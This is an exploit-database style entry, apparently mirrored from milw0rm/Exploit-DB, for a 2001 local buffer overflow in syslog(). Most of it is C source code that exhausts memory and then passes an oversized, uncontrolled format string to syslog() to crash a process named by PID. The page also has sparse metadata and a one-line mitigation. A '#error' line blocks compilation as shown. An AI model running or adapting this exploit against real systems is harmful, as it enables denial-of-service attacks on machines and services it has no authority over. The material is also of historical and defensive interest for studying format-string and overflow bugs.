Buffer Overflow in syslog()

vendor:

N/A

by:

milw0rm.com

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

Buffer Overflow in syslog()

This exploit is a buffer overflow in the syslog() function. It is triggered when a large string is passed to the syslog() function, which causes a stack overflow. The exploit is written in C and is designed to crash the system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the syslog() function is not used with large strings.

Source

Exploit-DB raw data:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <syslog.h>

#error

int main(int argc, char **argv)
{
   	char foo[1000];
        char bigmsg[10000];
	char *s, *hold_s; 
	int i = 0;
        
        memset(bigmsg, 'X', sizeof(bigmsg)-1);
   	if (argc < 2) {
           	printf("usage: %s <pid to kill>\n", argv[0]);
                exit(1);
        }
//	fork();
        memset(foo, 0, sizeof(foo));
        snprintf(foo, sizeof(foo), "/proc/%s/stat", argv[1]);
   	while (access(foo, F_OK) == 0) {
           	s = malloc(10000);
		if (s == NULL) {
			if (hold_s)
				free(hold_s);
/*			if (s)
				s[i%10000] = 0;
*/			printf("crashing ... \n");
			openlog("b00m", 0, 0);
        		syslog(1, bigmsg);
			closelog();
		}
                printf("%d\r", i++); fflush(stdout);
		hold_s = s;
        }
        return 0;
}


// milw0rm.com [2001-01-03]